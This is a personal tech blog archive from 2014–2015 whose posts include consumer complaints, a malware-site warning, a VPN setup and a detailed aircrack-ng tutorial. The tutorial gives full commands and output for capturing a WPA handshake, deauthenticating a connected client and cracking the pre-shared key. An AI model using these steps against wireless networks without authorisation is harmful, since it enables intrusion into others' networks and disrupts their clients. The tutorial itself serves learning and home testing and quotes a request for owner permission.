gist.notes

Monday, November 02, 2015

How to detect Macbook open and close lid

I find this useful when tracing the time I spent in the computer or when I opened/closed my computer.

Find when you opened the lid:

$ tail -n 1000 /var/log/system.log | grep "Wake reason: EC.LidOpen (User)"


  • Replace 1000 with the number of lines you wish to backtrack
  • system.log might have already logrotated. gunzip if the past logs are already rotated:

$ ls /var/log/system.log*

Example: $ gunzip /var/log/system.log.0.gz

Find when you closed the lid:

$ tail -n 1000 /var/log/system.log | grep "messageType = 0xE0000280"

Example line:

Nov  1 15:37:07 My-MacBook-Pro kernel[0]: AppleCamIn::systemWakeCall - messageType = 0xE0000280

Saturday, October 24, 2015

Globe's HOOQ.TV an (unethical) scam!!



After being terribly disappointed with the subscription stage and after also after a very disappointing test drive (at least Netflix tries to be do-no-evil), I am now very disappointed with the un-subscription of HOOQ.tv with Globe.


Globe sends me a message:


Hi! We'd like to remind you that your free HOOQ will end in 7 days on 10/27/2015. Upon expiry, your subscription will auto-renew to the paid version for P149 per month. If you don't want the paid version, text HOOQ STOP to 8888. before the expiry date. Thank you!


I send the HOOQ STOP to 888 and received:


Sorry, you have entered an invalid keyword. Please make sure your keyword is correct with no extra characters and spaces. For more info on promos, dial *143#, FREE from your Globe/TM mobile phone.


I called Globe Support (211).


Here's the scam:


- GoSurf 999 comes with the HOOQ Free Plan


- After the Free HOOQ Plan (which you did not use because it sucks) expires, it will auto-renew without your consent (!!! UNETHICAL !!!)


- The support agents cannot unsubscribe the HOOQ Free Plan because it needs to be on the Paid HOOQ plan before they can unsubscribe. This means after your billing cycle, you will be charged the first month of the Paid HOOQ plan before they can unsubscribe


- Globe (maybe in cahoots with HOOQ for scam revenue) will make you call again to make the bill adjustment!


Let's stand up to companies who are unethical and do evil! May they lose revenue and go to where the evil is!

Thursday, April 09, 2015

DO NOT USE my-shoppingbox.com (SCAM!!!)

This was an incident last November / December 2014. Yes it is the Black Friday Sale but who is not anticipating it.

First the weighting system. For some reason they push it to that extra 0.something of a pound so you pay for the whole pound. It is clearly a scam!

Second the filing system. It took them about 23 days just to record in their system that you have received a package.

First you should receive a notification from the merchant where you bought the item that they failed to receive the item. This is from USPS:

We're writing about the order(s) (#xxx). 

USPS attempted to deliver your package but was unable to leave the package unattended. In order to make arrangements for redelivery or pickup at your local Post Office, please visit USPS Redelivery and use the package tracking number xxx. 

If the package was attempted to be delivered to a business location that was closed during the time of the delivery attempt, USPS will automatically attempt to redeliver the package on the next business day. If your package was to be shipped to a PO Box address, it was likely too large to leave in your particular post office box

For more information about picking up this package, please visit USPS and click "Locate a Post Office" to find contact information for your local post office or call 1-800-ASK-USPS. 

After it is received (according to USPS; no confirmation from my-shoppingbox yet) you will have to wait for 23 days, maybe more for others. You can check Twitter for other users who experienced the same.

This is a recipe of their usual excuses in email because email is their only support channel. After about 3 weeks, they just gave up replying (not me ;-)

Dear  Mr. xxx,


Thanks for your email.

Kindly email us the courier tracking number, senders and description of the goods that you are expecting to receive as it may one of those with a bad address or label.

We do apologize also for the delay on uploading your package to your account as there are several packages that were left by various couriers in our drop box, with unreadable labels or names, or with missing suite numbers and we need to record the package details manually to ensure that we uploaded the package to the right consignee.

Please feel free to contact us should you need further information or assistance.


Sincerely,
MY-SHITTINGBOX.COM

***********

Dear Mr. xxx,


Thanks for your email

We do apologize for the delay of uploading your package details to your account due to the huge influx of deliveries that built-up during the Thanksgiving holidays. Rest assure that this problem will be fix as soon as possible.

We shall give this our highest priority.



Please feel free to contact us should you need further information or assistance.


Sincerely,
MY-SHITTINGBOX.COM

***********

Dear Mr. xxx,


Thanks for your email.

Kindly give us time more time to process all the backlogs until next week and will try to shipped out and deliver the packages the soonest possible time.


We do apologize for the delays. Rest assure that this problem will be fix as soon as possible.

Please feel free to contact us should you need further information or assistance.


Sincerely,
MY-SHITTINGBOX.COM

Tuesday, March 03, 2015

Google Apps Domain alias stuck "MX records setup validation in progress..."

I used the checker here to validate MX records -- https://toolbox.googleapps.com/apps/checkmx/check

Usual issues:

- MX priority and DNS record capitalization

- MX exchange server listening in port 25

- SPF record not indicated correctly

Thursday, February 12, 2015

WARNING!! Malware site: worldunlock.com

www.worldunlock.com/free.php links to this file WorldUnlock_v44_Setup.zip (WorldUnlock Codes Calculator)

https://www.virustotal.com/en/url/52bc6a17efef0838c4b2477edb1d608f71ca454149b6dbb90ffbcecbb8d4765b/analysis/ reports as malware/malicious site.

Wednesday, February 11, 2015

aircrack-ng (rt2x00 Mac80211 Linux wireless stack) in Ubuntu Trusty 14.04 (14.0.4.1) LTS

Ubuntu is actually installed in a Virtualbox virtual machine on Mac OS X Yosemite 10.10 (10.10.2). Before proceeding read the important intro below from http://www.aircrack-ng.org/doku.php?id=cracking_wpa#introduction

Install aircrack-ng suite.

$ sudo apt-get install aircrack-ng

It should install and provide the following.

# dpkg -s aircrack-ng
Package: aircrack-ng
Status: install ok installed
Priority: optional
Section: net
Installed-Size: 2167
Maintainer: Ubuntu Developers
Architecture: amd64
Version: 1:1.1-6
Depends: libc6 (>= 2.15), libgcrypt11 (>= 1.4.5), libsqlite3-0 (>= 3.5.9), zlib1g (>= 1:1.1.4), wireless-tools, iw
Recommends: wget
Description: wireless WEP/WPA cracking utilities
 aircrack-ng is an 802.11a/b/g WEP/WPA cracking program that can recover a
 40-bit, 104-bit, 256-bit or 512-bit WEP key once enough encrypted packets
 have been gathered. Also it can attack WPA1/2 networks with some advanced
 methods or simply by brute force.
 .
 It implements the standard FMS attack along with some optimizations,
 thus making the attack much faster compared to other WEP cracking tools.
 It can also fully use a multiprocessor system to its full power in order
 to speed up the cracking process.
 .
 aircrack-ng is a fork of aircrack, as that project has been stopped by
 the upstream maintainer.
Original-Maintainer: Carlos Alberto Lopez Perez
Homepage: http://www.aircrack-ng.org/

# air
airbase-ng              airdriver-ng            airodump-ng-oui-update
aircrack-ng             aireplay-ng             airolib-ng
airdecap-ng             airmon-ng               airserv-ng
airdecloak-ng           airodump-ng             airtun-ng

Patch the wi-fi card driver. Note that I am patching the Mac80211 driver in Ubuntu 14.04 (14.04.1). This is the new wireless stack of the Linux kernel. It is included in the kernel since 2.6.22, but drivers are only included since 2.6.24. This is my kernel version.

# uname -a
Linux ubuntu 3.13.0-45-generic #74-Ubuntu SMP Tue Jan 13 19:36:28 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

I have the Hawking HWUG1 USB Wi-fi with a supported chipset (Ralink rt73). See the compatibility list.



sudo apt-get update && apt-get upgrade -y
sudo apt-get install linux-headers-$(uname -r) -y
cd /usr/src/
sudo wget http://www.kernel.org/pub/linux/kernel/projects/backports/stable/v3.17.1/backports-3.17.1-1.tar.xz
sudo tar xvfJ backports-3.17.1-1.tar.xz
cd backports-3.17.1-1
sudo apt-get install patch
sudo wget http://patches.aircrack-ng.org/mac80211.compat08082009.wl_frag+ack_v1.patch
sudo wget -Ocompatdrivers_chan_qos_frag.patch http://www.pastie.org/pastes/8846771/download
sudo patch -p1 < mac80211.compat08082009.wl_frag+ack_v1.patch
sudo patch -p1  < compatdrivers_chan_qos_frag.patch
sudo make defconfig-wifi
sudo make
sudo make install
sudo update-initramfs -u
reboot

Mirror of http://patches.aircrack-ng.org/mac80211.compat08082009.wl_frag+ack_v1.patch -- https://gist.github.com/fortran01/dd6d2ae607d04f16404d

Mirror of http://www.pastie.org/pastes/8846771/download -- https://gist.github.com/fortran01/9bcf841a108d6c6e989c

Plug the card and this is my ifconfig.

# ifconfig wlan
wlan0     Link encap:UNSPEC  HWaddr 00-XX-XX-XX-XX-XX-XX-XX-00-00-00-00-00-00-00-00
          UP BROADCAST NOTRAILERS RUNNING PROMISC ALLMULTI  MTU:1500  Metric:1
          RX packets:175924 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:12806243 (12.8 MB)  TX bytes:0 (0.0 B)

This is the USB Wi-fi device plugged in.

# lsusb | grep Ralink
Bus 001 Device 003: ID 148f:2573 Ralink Technology, Corp. RT2501/RT2573 Wireless Adapter

Put card in monitor mode. (Notice I have the channel 11 indicated to narrow down to the channel of the AP that I want to target)


# airmon-ng start wlan0 11


Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID     Name
731     dhclient


Interface       Chipset         Driver

wlan0           Ralink 2573 USB rt73usb - [phy0]
                                (monitor mode enabled on mon0)

Test monitor mode. Replace with AP SSID, BSSID and monitor interface (mon0).

# aireplay-ng --test -e AztechXXX -a 00:11:22:CA:A5:44 mon0
11:53:30  Waiting for beacon frame (BSSID: 00:11:22:CA:A5:44) on channel 11
11:53:30  Trying broadcast probe requests...
11:53:30  Injection is working!
11:53:32  Found 1 AP

11:53:32  Trying directed probe requests...
11:53:32  00:11:22:CA:A5:44 - channel: 11 - 'AztechXXX'
11:53:33  Ping (min/avg/max): 4.545ms/19.723ms/45.179ms Power: -56.60
11:53:33  30/30: 100%

Start airodump-ng to collect authentication handshake. Replace channel, BSSID, and wireless interface. More hints here http://www.aircrack-ng.org/doku.php?id=cracking_wpa#step_2_-_start_airodump-ng_to_collect_authentication_handshake (READ THE IMPORTANT INTRO BELOW)

# airodump-ng --channel 11 --bssid 00:11:22:CA:A5:44 -w psk wlan0

Here what it looks like if a wireless client is connected to the network:

  CH  11 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:11:22:CA:A5:44
                                                                                                               
  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                               
  00:11:22:CA:A5:44   39 100       51      116   14   9  54  WPA CCMP   PSK  AztechXXX                           
                                                                                                               
  BSSID              STATION            PWR  Lost  Packets  Probes                                             
                                                                                                               
  00:11:22:CA:A5:44  00:0F:B5:FD:FB:C2   35     0      116  
 
In the screen above, notice the “WPA handshake: 00:11:22:CA:A5:44” in the top right-hand corner. This means airodump-ng has successfully captured the four-way handshake.

Here it is with no connected wireless clients:

  CH  11 ][ Elapsed: 4 s ][ 2007-03-24 17:51 
                                                                                                               
  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                               
  00:11:22:CA:A5:44   39 100       51        0    0   9  54  WPA CCMP   PSK  AztechXXX                         
                                                                                                               
  BSSID              STATION            PWR  Lost  Packets  Probes        


Use aireplay-ng to deauthenticate the wireless client. More hints from http://www.aircrack-ng.org/doku.php?id=cracking_wpa#step_3_-_use_aireplay-ng_to_deauthenticate_the_wireless_client

This step is optional. If you are patient, you can wait until airodump-ng captures a handshake when one or more clients connect to the AP. You only perform this step if you opted to actively speed up the process. The other constraint is that there must be a wireless client currently associated with the AP. If there is no wireless client currently associated with the AP, then you have to be patient and wait for one to connect to the AP so that a handshake can be captured. Needless to say, if a wireless client shows up later and airodump-ng did not capture the handshake, you can backtrack and perform this step.

This step sends a message to the wireless client saying that that it is no longer associated with the AP. The wireless client will then hopefully reauthenticate with the AP. The reauthentication is what generates the 4-way authentication handshake we are interested in collecting. This is what we use to break the WPA/WPA2 pre-shared key.

Based on the output of airodump-ng in the previous step, you determine a client which is currently connected. You need the MAC address for the following.

-c is the client. -a is the AP.

# aireplay-ng -0 1 -a 00:11:22:CA:A5:44 -c 00:0F:B5:FD:FB:C2 wlan0
16:05:49  Waiting for beacon frame (BSSID: 00:11:22:CA:A5:44) on channel 11
16:05:50  Sending 64 directed DeAuth. STMAC: [00:0F:B5:FD:FB:C2] [ 0| 0 ACKs]

Troubleshooting Tips

The deauthentication packets are sent directly from your PC to the clients. So you must be physically close enough to the clients for your wireless card transmissions to reach them. To confirm the client received the deauthentication packets, use tcpdump or similar to look for ACK packets back from the client. If you did not get an ACK packet back, then the client did not “hear” the deauthentication packet.

To crack the PSK follow Step 4 in http://www.aircrack-ng.org/doku.php?id=cracking_wpa#step_4_-_run_aircrack-ng_to_crack_the_pre-shared_key

Intro from www.aircrack-ng.org

Source: http://www.aircrack-ng.org/doku.php?id=cracking_wpa#step_2_-_start_airodump-ng_to_collect_authentication_handshake

This tutorial walks you through cracking WPA/WPA2 networks which use pre-shared keys. I recommend you do some background reading to better understand what WPA/WPA2 is. The Wiki links page has a WPA/WPA2 section. The best document describing WPA is Wi-Fi Security - WEP, WPA and WPA2. This is the link to download the PDF directly. The WPA Packet Capture Explained tutorial is a companion to this tutorial. 
WPA/WPA2 supports many types of authentication beyond pre-shared keys.  aircrack-ng can ONLY crack pre-shared keys. So make sure airodump-ng shows the network as having the authentication type of PSK, otherwise, don't bother trying to crack it.
There is another important difference between cracking WPA/WPA2 and WEP. This is the approach used to crack the WPA/WPA2 pre-shared key. Unlike WEP, where statistical methods can be used to speed up the cracking process, only plain brute force techniques can be used against WPA/WPA2. That is, because the key is not static, so collecting IVs like when cracking WEP encryption, does not speed up the attack. The only thing that does give the information to start an attack is the handshake between client and AP. Handshaking is done when the client connects to the network. Although not absolutely true, for the purposes of this tutorial, consider it true. Since the pre-shared key can be from 8 to 63 characters in length, it effectively becomes impossible to crack the pre-shared key.
The only time you can crack the pre-shared key is if it is a dictionary word or relatively short in length. Conversely, if you want to have an unbreakable wireless network at home, use WPA/WPA2 and a 63 character password composed of random characters including special symbols.
The impact of having to use a brute force approach is substantial. Because it is very compute intensive, a computer can only test 50 to 300 possible keys per second depending on the computer CPU. It can take hours, if not days, to crunch through a large dictionary. If you are thinking about generating your own password list to cover all the permutations and combinations of characters and special symbols, check out this brute force time calculator first. You will be very surprised at how much time is required.
IMPORTANT This means that the passphrase must be contained in the dictionary you are using to break WPA/WPA2. If it is not in the dictionary then aircrack-ng will be unable to determine the key.
There is no difference between cracking WPA or WPA2 networks. The authentication methodology is basically the same between them. So the techniques you use are identical.
It is recommended that you experiment with your home wireless access point to get familiar with these ideas and techniques. If you do not own a particular access point, please remember to get permission from the owner prior to playing with it.

Monday, January 12, 2015

Use Private Internet Access (PIA) in DigitalOcean

tags: PrivateInternetAccess, Digital Ocean, VPS, VPN

This runs the PIA VPN using OpenVPN all from the command line.

sudo apt-get install openvpn network-manager-openvpn
Not sure if you need network-manager-openvpn.

sudo wget https://www.privateinternetaccess.com/openvpn/openvpn.zip
Extract. Move ca.crt and crl.pem to /etc/openvpn

Move "Hong Kong.ovpn" to "/etc/openvpn/Hong Kong.config" for example.

Modified the following lines.

auth-user-pass /etc/openvpn/login.conf
route-up /etc/openvpn/route-up.sh

These are the contents of these files.

# cat /etc/openvpn/login.conf
username
password

Replace with your username and password.

# cat route-up.sh 
#!/bin/bash

ip route flush table 100
ip route flush cache
ip rule add from x.x.x.x table 100
ip route add table 100 to y.y.y.y/y dev ethX
ip route add table 100 default via z.z.z.z

Replace x.x.x.x with your public IP address, y.y.y.y/y with your subnet. Compute using http://jodies.de/ipcalc. Hint: Input public IP and netmask, you should get your Network/Subnet.

Permissions of the previous files.

-r-------- 1 root root   20 Jan 11 04:27 login.conf
-rw-r--r-- 1 root root  284 Jan 11 14:51 Hong Kong.conf

You can then run the VPN.

/etc/openvpn# openvpn "Hong Kong.conf"
Sun Jan 11 14:52:20 2015 OpenVPN 2.3.2 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [EPOLL] [PKCS11] [eurephia] [MH] [IPv6] built on Dec  1 2014
Sun Jan 11 14:52:20 2015 NOTE: starting with OpenVPN 2.1, '--script-security 2' or higher is required to call user-defined scripts or executables
Sun Jan 11 14:52:20 2015 UDPv4 link local: [undef]
Sun Jan 11 14:52:20 2015 UDPv4 link remote: [AF_INET]x.x.x.x:1194
Sun Jan 11 14:52:20 2015 WARNING: this configuration may cache passwords in memory -- use the auth-nocache option to prevent this
Sun Jan 11 14:52:21 2015 [Private Internet Access] Peer Connection Initiated with [AF_INET]x.x.x.x:1194
Sun Jan 11 14:52:24 2015 TUN/TAP device tun0 opened
Sun Jan 11 14:52:24 2015 do_ifconfig, tt->ipv6=0, tt->did_ifconfig_ipv6_setup=0
Sun Jan 11 14:52:24 2015 /sbin/ip link set dev tun0 up mtu 1500
Sun Jan 11 14:52:24 2015 /sbin/ip addr add dev tun0 local y.y.y.y peer z.z.z.z
Sun Jan 11 14:52:24 2015 WARNING: External program may not be called unless '--script-security 2' or higher is enabled. See --help text or man page for detailed info.
Sun Jan 11 14:52:24 2015 WARNING: Failed running command (--route-up): external program fork failed
Sun Jan 11 14:52:24 2015 Initialization Sequence Completed

Check out this page how to auto-start.

To be able to port forward.

curl -d "user=USERNAME&pass=PASSWORD&client_id=UNIQUE_CLIENT_ID&local_ip=INTERNAL_IP_FROM_PIA" https://www.privateinternetaccess.com/vpninfo/port_forward_assignment

Replace USERNAME, PASSWORD, UNIQUE_CLIENT_ID, and INTERNAL_IP_FROM_PIA.

UNIQUE_CLIENT_ID you can get using (commands OS X only):

$ head -n 100 /dev/urandom | md5 > ~/.pia_client_id
$ cat ~/.pia_client_id

Internal IP is of the form 10.x.x.x.

curl should reply with something like.

{"port":49845}

You can test using.

wget http://ipecho.net/plain -O - -q ; echo
109.201.152.14

Hints taken from:

https://www.privateinternetaccess.com/forum/discussion/180/port-forwarding-without-the-application-advanced-users

http://serverfault.com/questions/515272/openvpn-bypass-on-some-ports

https://forum.linode.com/viewtopic.php?p=50114&sid=b440414422596bb7dbc96cf7c9ee511f#p50114

http://raspinotes.wordpress.com/2013/06/04/setup-vpn-with-privateinternetaccess-com/comment-page-1/